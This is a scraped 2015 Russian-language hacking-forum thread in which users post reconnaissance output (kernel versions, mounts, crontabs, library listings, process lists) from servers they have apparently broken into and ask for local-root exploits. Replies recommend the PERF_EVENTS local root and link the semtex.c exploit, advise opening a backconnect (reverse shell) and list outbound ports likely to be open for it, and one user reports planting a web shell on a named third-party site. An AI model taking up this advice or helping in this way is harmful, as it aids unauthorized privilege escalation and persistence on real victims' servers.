52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

$ cat /proc/sys/vm/mmap_min_addr
65536

YaBtr

11.04.2015, 10:48

Vip77 said:
↑ (https://antichat.live/posts/3836707/)
Есть что-нибудь под сие?

Code:
$ uname -a
Linux srv100 2.6.32-5-686-bigmem #1 SMP Sat May 5 02:21:15 UTC 2012 i686 GNU/Linux

$ mount
/dev/sda2 on / type ext4 (rw,noatime,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/sda1 on /boot type ext3 (rw,noatime)
/dev/sda5 on /var type ext4 (rw,noatime)
/dev/sda6 on /home type ext4 (rw,nosuid,nodev,noatime,usrquota)

$ cat /etc/issue
Debian GNU/Linux 6.0 \n \l

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

$ cat /proc/sys/vm/mmap_min_addr
65536

Посмотрите в сторону PERF_EVENTS local root.

KIR@PRO

28.04.2015, 12:30

А как вы собираетесь понять, что повысили привилегии, если у вас нет стабильной сессии? Сделайте backconnect и с него дальше пробуйте.

Я не говорю, что из-за этого все ваши проблемы, просто повышение привилегий производится из под шелла, когда используется подготовленный код для выполнения с повышенными правами, но большинство эксплоитов попросту повышают права для процесса из под которого они были запущены (в вашем случае это процесс (один из) веб-сервера, который после вывода данных в браузер, завершится и толку от повышения прав нет, а при постоянном коннекте все ваши последующие команды будут выполняться с повышенными привилегиями (при успешном повышении прав соответственно xD )).

p.s. ваш пост - эталон оформления!

mazaxaka

29.04.2015, 06:01

за (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php)лил шелл, изначально група \овнер были 498 ( apache ) Group: 500 ( apache )

потом залил в доступный для записи файл, созданый нужным мне юзером

thumbs.php (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php)24.18 KB 2015-04-29 00:49:16 kesdn/kesdn -rw-rw-rw-R (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php) T (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php) E (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php) D (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php)

но все равно при заходе на шел, нужного юзера, в верху мне пишется 498 ( apache ) Group: 500 ( apache )

как зайти под нужным юзером?

KIR@PRO

29.04.2015, 11:40

mazaxaka said:
↑ (https://antichat.live/posts/3841716/)
за (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php)
лил шелл, изначально група \овнер были 498 ( apache ) Group: 500 ( apache )
потом залил в доступный для записи файл, созданый нужным мне юзером
thumbs.php (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php)
24.18 KB 2015-04-29 00:49:16 kesdn/kesdn
-rw-rw-rw-R (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php)
T (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php)
E (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php)
D (http://sexxxypussy.net/wp-content/gallery/foto_blow/thumbs/thumbs_minet11.php)
но все равно при заходе на шел, нужного юзера, в верху мне пишется 498 ( apache ) Group: 500 ( apache )
как зайти под нужным юзером?

Ответ: ни как.

Скрипты запускаются не от имени владельца/группы файла, они запускаются с правами сервера, в вашем случае (apache).

TADIAMOND

30.04.2015, 01:49

есть что нибуть под такое? помогите пожалуйста!

$ uname -a

Linux server.domain.com 2.6.38.2.domU.x86_64 #1 SMP Wed Mar 30 13:47:22 EEST 2011 x86_64 x86_64 x86_64 GNU/Linux

faza02

30.04.2015, 02:12

TADIAMOND said:
↑ (https://antichat.live/posts/3841953/)
есть что нибуть под такое? помогите пожалуйста!
$ uname -a
Linux server.domain.com 2.6.38.2.domU.x86_64 #1 SMP Wed Mar 30 13:47:22 EEST 2011 x86_64 x86_64 x86_64 GNU/Linux

прочитать первый пост? оформить, как надо? попробовать semtex?

http://packetstormsecurity.com/files/121616/semtex.c

TADIAMOND

30.04.2015, 02:34

faza02 said:
↑ (https://antichat.live/posts/3841957/)
прочитать первый пост? оформить, как надо? попробовать semtex?
http://packetstormsecurity.com/files/121616/semtex.c

Спасибо, поспешил, первый раз собираюсь рутать, опытат вообще ноль, в следующий раз буду более осмотрителен!

Unknowhacker

06.05.2015, 18:41

Подскажите эксплоит

Code:
uname -a
Linux xxx 3.10.25-gentoo #1 SMP Sat Feb 1 15:48:44 EET 2014 x86_64 Intel(R) Xeon(R) CPU E5630 @ 2.53GHz GenuineIntel GNU/Linux

ls -la /boot 2>&1
total 8
drwxr-xr-x 2 root root 4096 Sep 13 2012 .
drwxr-xr-x 21 root root 4096 Feb 3 00:38 ..

ls -la --full-time /lib/libc* 2>&1
-rwxr-xr-x 1 root root 1716472 2015-02-03 00:38:44.273116240 +0200 /lib/libc-2.19.so
lrwxrwxrwx 1 root root 12 2015-02-03 00:38:41.553121571 +0200 /lib/libc.so.6 -> libc-2.19.so
lrwxrwxrwx 1 root root 14 2012-09-13 14:06:50.297258314 +0300 /lib/libcap.so.2 -> libcap.so.2.22
-rwxr-xr-x 1 root root 18744 2012-09-13 14:06:49.327261624 +0300 /lib/libcap.so.2.22
-rwxr-xr-x 1 root root 190688 2015-02-03 00:38:44.743115317 +0200 /lib/libcidn-2.19.so
lrwxrwxrwx 1 root root 15 2015-02-03 00:38:41.553121571 +0200 /lib/libcidn.so.1 -> libcidn-2.19.so
lrwxrwxrwx 1 root root 17 2014-02-01 15:14:12.306873983 +0200 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 14480 2014-02-01 15:14:13.286872409 +0200 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 17 2014-02-01 14:34:01.189952358 +0200 /lib/libcrack.so.2 -> libcrack.so.2.8.1
-rwxr-xr-x 1 root root 43336 2014-02-01 14:34:02.489951842 +0200 /lib/libcrack.so.2.8.1
-rwxr-xr-x 1 root root 34992 2015-02-03 00:38:44.273116240 +0200 /lib/libcrypt-2.19.so
lrwxrwxrwx 1 root root 16 2015-02-03 00:38:41.553121571 +0200 /lib/libcrypt.so.1 -> libcrypt-2.19.so

mount 2>&1
rootfs on / type rootfs (rw)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,nosuid,relatime,size=10240k,nr_inodes=4614510, mode=755)
devpts on /dev/pts type devpts (rw,relatime,gid=5,mode=620)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
/dev/sda2 on / type ext4 (rw,noatime,data=ordered)
tmpfs on /run type tmpfs (rw,nosuid,nodev,relatime,size=3692176k,mode=755)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,nosuid,nodev,noexec,relatime)
/dev/sda3 on /home type ext4 (rw,noatime)
/dev/sda4 on /storage type ext4 (rw,noatime)
/dev/md0 on /var/www type ext4 (rw,noatime,discard)
none on /tmp type tmpfs (rw,size=8G,nr_inodes=1M)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nodev,noexec,nosuid)

df -h 2>&1
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 46G 31G 13G 72% /
udev 10M 0 10M 0% /dev
tmpfs 3.6G 832K 3.6G 1% /run
shm 18G 0 18G 0% /dev/shm
/dev/sda3 46G 714M 43G 2% /home
/dev/sda4 3.5T 2.7T 690G 80% /storage
/dev/md0 147G 11G 129G 8% /var/www
none 8.0G 134M 7.9G 2% /tmp

cat /etc/issue 2>&1

This is \n.\O (\s \m \r) \t

$ cat /etc/crontab 2>&1
# for vixie cron
# $Header: /var/cvsroot/gentoo-x86/sys-process/vixie-cron/files/crontab-3.0.1-r4,v 1.2 2009/05/12 09:13:46 bangert Exp $

# Global variables
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# check scripts in cron.hourly, cron.daily, cron.weekly and cron.monthly
59 * * * * root rm -f /var/spool/cron/lastrun/cron.hourly
9 3 * * * root rm -f /var/spool/cron/lastrun/cron.daily
19 4 * * 6 root rm -f /var/spool/cron/lastrun/cron.weekly
29 5 1 * * root rm -f /var/spool/cron/lastrun/cron.monthly
*/10 * * * * root test -x /usr/sbin/run-crons && /usr/sbin/run-crons
*/5 * * * * root /bin/sh /usr/local/bin/srvstat.sh
51 2 * * * root /bin/sh /usr/local/bin/sitestat.sh
@reboot root mkdir -p /tmp/unncache && chown apache:apache /tmp/unncache
@reboot root mkdir -p /tmp/amn-sessions && chown apache:apache /tmp/amn-sessions

cat /proc/version 2>&1
Linux version 3.10.25-gentoo (root@xxx) (gcc version 4.7.3 (Gentoo 4.7.3-r1 p1.4, pie-0.5.5) ) #1 SMP Sat Feb 1 15:48:44 EET 2014

UPD:А никто не знает как подобрать открытый порт для бэк коннекта?!

10.06.2015, 17:27

А никто не знает как подобрать открытый порт для бэк коннекта?!

Исходящие зачастую разрешены на 25, 53, 80, 8080, 21

nikonic

17.06.2015, 13:44

Code:
$ uname -a
FreeBSD сайт 7.4-RELEASE-p7 FreeBSD 7.4-RELEASE-p7 #3: Fri May 4 12:59:48 YEKT 2012 alex@ сайт:/usr/obj/usr/src/sys/сайт i386
$ ls -la /boot
total 3328
drwxr-xr-x 12 root wheel 1024 Aug 4 2013 .
drwxr-xr-x 22 root wheel 512 May 14 2012 ..
drwxr-xr-x 2 root wheel 28672 Feb 17 2011 GENERIC
-r--r--r-- 1 root wheel 7689 May 14 2012 beastie.4th
-r--r--r-- 1 root wheel 8192 May 14 2012 boot
-r--r--r-- 1 root wheel 512 May 14 2012 boot0
-r--r--r-- 1 root wheel 512 May 14 2012 boot0sio
-r--r--r-- 1 root wheel 512 May 14 2012 boot1
-r--r--r-- 1 root wheel 7680 May 14 2012 boot2
-r--r--r-- 1 root wheel 1201 May 14 2012 cdboot
drwxr-xr-x 2 root wheel 512 May 14 2012 defaults
-r--r--r-- 1 root wheel 1746 Feb 17 2011 device.hints
drwxr-xr-x 2 root wheel 512 Feb 17 2011 firmware
-r--r--r-- 1 root wheel 2258 May 14 2012 frames.4th
-r--r--r-- 1 root wheel 7567 May 14 2012 gptboot
-r--r--r-- 1 root wheel 26259 May 14 2012 gptzfsboot
drwxr-xr-x 2 root wheel 12288 Aug 5 2013 kernel
drwxr-xr-x 2 root wheel 28672 Mar 30 2011 kernel.GENERIC
drwxr-xr-x 2 root wheel 512 Aug 3 2013 kernel.сайт
drwxr-xr-x 2 root wheel 12288 Aug 5 2013 kernel.modules
drwxr-xr-x 2 root wheel 512 May 14 2012 kernel.old
-r-xr-xr-x 1 root wheel 253952 May 14 2012 loader
-r--r--r-- 1 root wheel 5865 May 14 2012 loader.4th
-rw-r--r-- 1 root wheel 18 Mar 30 2011 loader.conf
-rw-r--r-- 1 root wheel 17 Mar 30 2011 loader.conf.old
-r--r--r-- 1 root wheel 15219 May 14 2012 loader.help
-r-xr-xr-x 1 root wheel 253952 Dec 30 2011 loader.old
-r--r--r-- 1 root wheel 392 Feb 17 2011 loader.rc
-r--r--r-- 1 root wheel 512 May 14 2012 mbr
drwxr-xr-x 2 root wheel 512 Feb 17 2011 modules
-r--r--r-- 1 root wheel 512 May 14 2012 pmbr
-r--r--r-- 1 root wheel 256000 May 14 2012 pxeboot
-r--r--r-- 1 root wheel 699 May 14 2012 screen.4th
-r--r--r-- 1 root wheel 35136 May 14 2012 support.4th
drwxr-xr-x 2 root wheel 512 Feb 17 2011 zfs
-r--r--r-- 1 root wheel 33280 May 14 2012 zfsboot
-r-xr-xr-x 1 root wheel 274432 May 14 2012 zfsloader
-r-xr-xr-x 1 root wheel 274432 Dec 30 2011 zfsloader.old
$ mount
/dev/mfid0a on / (ufs, local, noatime, soft-updates)
devfs on /dev (devfs, local)
/dev/mfid0e on /usr/local (ufs, local, noatime, soft-updates)
/dev/mfid0d on /usr (ufs, local, noatime, soft-updates)
/dev/mfid0f on /var (ufs, local, noatime, soft-updates)
/dev/mfid0g on /mail (ufs, local, noatime, soft-updates)
/dev/mfid0h on /local (ufs, local, noatime, soft-updates)
/dev/mfid1s1d on /opt (ufs, local, noatime)
/dev/mfid1s1e on /backup (ufs, local, noatime)
/dev/md0 on /local/www/сайт/cache (ufs, asynchronous, local, noexec, nosuid)
$ df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/mfid0a 1.9G 419M 1.4G 23% /
devfs 1.0K 1.0K 0B 100% /dev
/dev/mfid0e 4.8G 4.0K 4.5G 0% /usr/local
/dev/mfid0d 4.8G 4.4G 85M 98% /usr
/dev/mfid0f 48G 40G 4.8G 89% /var
/dev/mfid0g 194G 127G 51G 71% /mail
/dev/mfid0h 315G 225G 65G 78% /local
/dev/mfid1s1d 291G 28G 240G 10% /opt
/dev/mfid1s1e 286G 246G 17G 94% /backup
/dev/md0 31M 274K 28M 1% /local/www/сайт/cache
$ cat /etc/crontab
# /etc/crontab - root's crontab for FreeBSD
#
# $FreeBSD: src/etc/crontab,v 1.32.24.1.4.1 2010/12/21 17:10:29 kensmith Exp $
#
SHELL=/bin/sh
PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
#
#minute hour mday month wday who command
#
*/5 * * * * root /usr/libexec/atrun
#
# Save some entropy so that /dev/random can re-seed on boot.
*/11 * * * * operator /usr/libexec/save-entropy
#
# Rotate log files every hour, if necessary.
0 * * * * root newsyslog
#
# Perform daily/weekly/monthly maintenance.
1 3 * * * root periodic daily
15 4 * * 6 root periodic weekly
30 5 1 * * root periodic monthly
#
# Adjust the time zone if the CMOS clock keeps local time, as opposed to
# UTC time. See adjkerntz(8) for details.
1,31 0-5 * * * root adjkerntz –a
$ ls -la /libexec
total 736
drwxr-xr-x 2 root wheel 512 May 14 2012 .
drwxr-xr-x 22 root wheel 512 May 14 2012 ..
-r-xr-xr-x 1 root wheel 180896 Dec 30 2011 ld-elf.so.1
-r-xr-xr-x 1 root wheel 189184 Feb 17 2011 ld-elf.so.1.old
$ ps axfu
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
www 95411 42.9 1.2 54276 41460 ?? S 1:32PM 6:07.03 /usr/local/sbin/ht
www 5177 25.5 2.2 100356 74032 ?? R 2:32PM 0:18.89 /usr/local/sbin/ht
www 90963 8.9 1.2 54532 41976 ?? S 1:03PM 8:25.48 /usr/local/sbin/ht
www 95403 8.4 1.2 54276 41800 ?? R 1:32PM 5:43.07 /usr/local/sbin/ht
www 88613 8.3 1.2 54532 41816 ?? S 12:49PM 10:15.64 /usr/local/sbin/ht
www 5696 7.9 0.1 3756 2668 ?? S 2:35PM 0:00.02 sendmail: ./t5H9Zj
www 5695 7.8 0.0 3460 1144 ?? S 2:35PM 0:00.00 sh -c /usr/sbin/se
www 94821 7.8 1.2 55300 41244 ?? S 1:28PM 6:21.93 /usr/local/sbin/ht
www 96019 7.6 1.2 54276 41068 ?? S 1:36PM 5:11.63 /usr/local/sbin/ht
www 95914 7.5 1.2 54276 41184 ?? S 1:35PM 5:31.22 /usr/local/sbin/ht
www 5458 7.1 0.8 40964 26572 ?? S 2:34PM 0:07.37 /usr/local/sbin/ht
www 95698 6.6 1.2 53252 40632 ?? S 1:34PM 5:23.52 /usr/local/sbin/ht
www 5689 3.8 0.7 39940 22140 ?? S 2:35PM 0:00.56 /usr/local/sbin/ht
www 914 3.6 0.2 8192 6688 ?? R 22May15 1399:37.78 nginx: worker proc
www 913 2.9 0.2 9216 7344 ?? S 22May15 1401:01.32 nginx: worker proc
www 95287 2.8 1.3 55300 42616 ?? R 1:31PM 6:12.23 /usr/local/sbin/ht
www 5692 1.6 0.6 39940 20212 ?? S 2:35PM 0:00.23 /usr/local/sbin/ht
www 932 0.0 0.3 36776 10456 ?? I 22May15 0:00.21 /usr/local/sbin/ht
www 5702 0.0 0.0 3460 1144 ?? S 2:35PM 0:00.00 sh -c ps axfu
www 5703 0.0 0.0 3244 944 ?? R 2:35PM 0:00.00 ps axfu
www 20314 0.0 0.0 0 0 ?? Z Mon09AM 0:00.00
www 42814 0.0 0.0 0 0 ?? Z Sun11PM 0:00.00
www 50717 0.0 0.0 3460 1100 ?? I 8Jun15 0:00.01 /bin/sh -i
www 52999 0.0 0.0 3128 700 ?? I 8Jun15 0:02.89 tail -f pureftpd.l
www 58328 0.0 0.0 0 0 ?? Z Sun12PM 0:00.05
www 89316 0.0 0.0 0 0 ?? Z 3:28PM 0:00.00
ls -la /tmp
total 1280
drwxrwxrwt 10 root wheel 3072 Jun 17 14:39 .
drwxr-xr-x 22 root wheel 512 May 14 2012 ..
drwxrwxrwt 2 root wheel 512 May 22 17:34 .ICE-unix
drwxrwxrwt 2 root wheel 512 May 22 17:34 .X11-unix
drwxrwxrwt 2 root wheel 512 May 22 17:34 .XIM-unix
drwxrwxrwt 2 root wheel 512 May 22 17:34 .font-unix
-rw------- 1 spamassasin wheel 7221 Nov 25 2013 .spamassassin12210SilOHtmp
drwx------ 3 www www 512 Dec 19 2011 fast
prw------- 1 root wheel 0 Mar 30 2011 make_fifo_VRxkXE6sJ
drwx------ 2 alex wheel 512 Nov 15 2012 mc-alex
drwx------ 2 root wheel 512 Jun 2 11:22 mc-root
-rw-r--r-- 1 www wheel 0 Jun 8 15:53 overwrites
-rw------- 1 root wheel 36 Jun 23 2011 periodic.slLwSSsz08
-rw------- 1 root wheel 48 Jun 23 2011 periodic.vODgX3C8Hg
drwxr-xr-x 3 root wheel 512 Apr 9 2011 screens
-rw------- 1 root wheel 0 Jun 23 2011 security.MxksURwR
$ id
uid=80(www) gid=80(www) groups=80(www)

ErrNick

01.07.2015, 21:06

подскажите что нить для этой машинки

uname -a

Code:
Linux mh40.mobyhost.ru 2.6.18-400.1.1.el5 #1 SMP Thu Dec 18 00:59:53 EST 2014 x86_64 x86_64 x86_64 GNU/Linux

ls -la --full-time /lib

Code:
total 17352
drwxr-xr-x 11 root root 4096 2015-06-16 01:09:12.000000000 +0300 .
drwxr-xr-x 28 root root 4096 2015-06-30 23:01:02.000000000 +0300 ..
-rw-r--r-- 1 root root 65 2015-05-13 13:33:41.000000000 +0300 .libcrypto.so.0.9.8e.hmac
lrwxrwxrwx 1 root root 25 2015-05-14 01:08:56.000000000 +0300 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac
-rw-r--r-- 1 root root 65 2015-05-13 13:33:41.000000000 +0300 .libssl.so.0.9.8e.hmac
lrwxrwxrwx 1 root root 22 2015-05-14 01:08:56.000000000 +0300 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac
drwxr-xr-x 2 root root 4096 2014-10-01 01:12:30.000000000 +0400 bdevid
lrwxrwxrwx 1 root root 14 2014-10-01 01:11:14.000000000 +0400 cpp -> ../usr/bin/cpp
drwxr-xr-x 2 root root 4096 2014-10-01 01:11:27.000000000 +0400 firmware
drwxr-xr-x 3 root root 4096 2015-01-27 21:28:03.000000000 +0300 i686
drwxr-xr-x 6 root root 4096 2013-01-09 07:14:22.000000000 +0400 kbd
-rwxr-xr-x 1 root root 130860 2015-01-27 22:04:53.000000000 +0300 ld-2.5.so
lrwxrwxrwx 1 root root 9 2015-01-28 18:11:41.000000000 +0300 ld-linux.so.2 -> ld-2.5.so
lrwxrwxrwx 1 root root 13 2015-01-28 18:11:50.000000000 +0300 ld-lsb.so.3 -> ld-linux.so.2
-rwxr-xr-x 1 root root 7664 2015-01-27 22:04:53.000000000 +0300 libBrokenLocale-2.5.so
lrwxrwxrwx 1 root root 22 2015-01-28 18:11:41.000000000 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
-rwxr-xr-x 1 root root 16704 2015-01-27 22:04:53.000000000 +0300 libSegFault.so
-rwxr-xr-x 1 root root 14128 2015-01-27 22:04:53.000000000 +0300 libanl-2.5.so
lrwxrwxrwx 1 root root 13 2015-01-28 18:11:41.000000000 +0300 libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx 1 root root 18 2010-02-26 16:19:28.000000000 +0300 libasound.so.2 -> libasound.so.2.0.0
-rwxr-xr-x 1 root root 907328 2009-01-21 06:47:23.000000000 +0300 libasound.so.2.0.0
lrwxrwxrwx 1 root root 17 2012-03-13 01:13:26.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0
-rwxr-xr-x 1 root root 95740 2012-02-22 19:10:06.000000000 +0400 libaudit.so.0.0.0
lrwxrwxrwx 1 root root 19 2012-03-13 01:13:26.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
-rwxr-xr-x 1 root root 58932 2012-02-22 19:10:06.000000000 +0400 libauparse.so.0.0.0
lrwxrwxrwx 1 root root 15 2014-10-01 01:12:22.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
-rwxr-xr-x 1 root root 36740 2014-09-18 14:12:28.000000000 +0400 libblkid.so.1.0
-rwxr-xr-x 1 root root 1706208 2015-01-27 22:04:54.000000000 +0300 libc-2.5.so
lrwxrwxrwx 1 root root 11 2015-01-28 18:11:42.000000000 +0300 libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 14 2009-09-29 10:32:08.000000000 +0400 libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11560 2007-03-14 21:15:10.000000000 +0300 libcap.so.1.10
-rwxr-xr-x 1 root root 191708 2015-01-27 22:04:55.000000000 +0300 libcidn-2.5.so
lrwxrwxrwx 1 root root 14 2015-01-28 18:11:42.000000000 +0300 libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 2014-10-01 01:12:22.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6364 2014-09-18 14:12:28.000000000 +0400 libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 2015-01-27 22:04:55.000000000 +0300 libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 2015-01-28 18:11:42.000000000 +0300 libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1299328 2015-05-13 13:33:41.000000000 +0300 libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 14 2009-09-29 10:32:08.000000000 +0400 libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root 19 2015-05-14 01:08:56.000000000 +0300 libcrypto.so.6 -> libcrypto.so.0.9.8e
-rwxr-xr-x 1 root root 838860 2007-01-07 08:37:48.000000000 +0300 libdb-4.1.so
-rwxr-xr-x 1 root root 934132 2007-01-07 08:37:48.000000000 +0300 libdb-4.2.so
-rwxr-xr-x 1 root root 1010204 2010-07-12 20:11:02.000000000 +0400 libdb-4.3.so
-rwxr-xr-x 1 root root 905704 2007-01-07 08:37:48.000000000 +0300 libdb_cxx-4.1.so
-rwxr-xr-x 1 root root 1019472 2007-01-07 08:37:48.000000000 +0300 libdb_cxx-4.2.so
lrwxrwxrwx 1 root root 18 2013-10-20 01:11:03.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0
-rwxr-xr-x 1 root root 257492 2013-10-02 01:59:51.000000000 +0400 libdbus-1.so.3.4.0
-r--r--r-- 1 root root 45098 2014-11-18 13:11:21.000000000 +0300 libdevmapper-event.a
lrwxrwxrwx 1 root root 26 2014-11-19 01:08:51.000000000 +0300 libdevmapper-event.so -> libdevmapper-event.so.1.02
-r-xr-xr-x 1 root root 18488 2014-11-18 13:11:29.000000000 +0300 libdevmapper-event.so.1.02
-r--r--r-- 1 root root 496324 2014-11-18 13:11:15.000000000 +0300 libdevmapper.a
lrwxrwxrwx 1 root root 20 2014-11-19 01:08:51.000000000 +0300 libdevmapper.so -> libdevmapper.so.1.02
-r-xr-xr-x 1 root root 163292 2014-11-18 13:11:29.000000000 +0300 libdevmapper.so.1.02
-rwxr-xr-x 1 root root 20668 2015-01-27 22:04:55.000000000 +0300 libdl-2.5.so
lrwxrwxrwx 1 root root 12 2015-01-28 18:11:42.000000000 +0300 libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx 1 root root 13 2014-10-01 01:12:22.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x 1 root root 20192 2014-09-18 14:12:28.000000000 +0400 libe2p.so.2.3
lrwxrwxrwx 1 root root 17 2012-06-14 01:12:14.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0
-rwxr-xr-x 1 root root 135932 2012-06-13 18:35:31.000000000 +0400 libexpat.so.0.5.0
lrwxrwxrwx 1 root root 16 2014-10-01 01:12:22.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x 1 root root 113892 2014-09-18 14:12:28.000000000 +0400 libext2fs.so.2.4
-rwxr-xr-x 1 root root 45192 2014-09-18 07:05:57.000000000 +0400 libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 28 2014-10-01 01:12:23.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 23 2009-09-29 10:32:11.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 644472 2009-03-25 04:52:17.000000000 +0300 libglib-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-09-29 10:32:08.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 11396 2009-03-25 04:52:17.000000000 +0300 libgmodule-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-09-29 10:32:08.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 259128 2009-03-25 04:52:17.000000000 +0300 libgobject-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-09-29 10:32:11.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 14660 2009-03-25 04:52:17.000000000 +0300 libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 27964 2007-03-15 06:26:22.000000000 +0300 libiw.so.28
-rwxr-xr-x 1 root root 6404 2007-01-06 10:57:38.000000000 +0300 libkeyutils-1.2.so
lrwxrwxrwx 1 root root 18 2009-09-29 10:32:08.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
-rwxr-xr-x 1 root root 216544 2015-01-27 22:04:55.000000000 +0300 libm-2.5.so
lrwxrwxrwx 1 root root 11 2015-01-28 18:11:42.000000000 +0300 libm.so.6 -> libm-2.5.so
-rwxr-xr-x 1 root root 109740 2015-01-27 22:04:55.000000000 +0300 libnsl-2.5.so
lrwxrwxrwx 1 root root 13 2015-01-28 18:11:42.000000000 +0300 libnsl.so.1 -> libnsl-2.5.so
-rwxr-xr-x 1 root root 36468 2015-01-27 22:04:55.000000000 +0300 libnss_compat-2.5.so
lrwxrwxrwx 1 root root 20 2015-01-28 18:11:42.000000000 +0300 libnss_compat.so.2 -> libnss_compat-2.5.so
-rwxr-xr-x 1 root root 827876 2015-01-05 13:12:47.000000000 +0300 libnss_db-2.2.so
lrwxrwxrwx 1 root root 16 2015-01-06 01:08:48.000000000 +0300 libnss_db.so.2 -> libnss_db-2.2.so
-rwxr-xr-x 1 root root 21948 2015-01-27 22:04:56.000000000 +0300 libnss_dns-2.5.so
lrwxrwxrwx 1 root root 17 2015-01-28 18:11:42.000000000 +0300 libnss_dns.so.2 -> libnss_dns-2.5.so
-rwxr-xr-x 1 root root 50848 2015-01-27 22:04:56.000000000 +0300 libnss_files-2.5.so
lrwxrwxrwx 1 root root 19 2015-01-28 18:11:42.000000000 +0300 libnss_files.so.2 -> libnss_files-2.5.so
-rwxr-xr-x 1 root root 22764 2015-01-27 22:04:56.000000000 +0300 libnss_hesiod-2.5.so
lrwxrwxrwx 1 root root 20 2015-01-28 18:11:42.000000000 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
-rwxr-xr-x 1 root root 3217504 2015-06-15 15:37:43.000000000 +0300 libnss_ldap-2.5.so
lrwxrwxrwx 1 root root 18 2015-06-16 01:09:12.000000000 +0300 libnss_ldap.so.2 -> libnss_ldap-2.5.so
-rwxr-xr-x 1 root root 46624 2015-01-27 22:04:56.000000000 +0300 libnss_nis-2.5.so
lrwxrwxrwx 1 root root 17 2015-01-28 18:11:42.000000000 +0300 libnss_nis.so.2 -> libnss_nis-2.5.so
-rwxr-xr-x 1 root root 55804 2015-01-27 22:04:56.000000000 +0300 libnss_nisplus-2.5.so
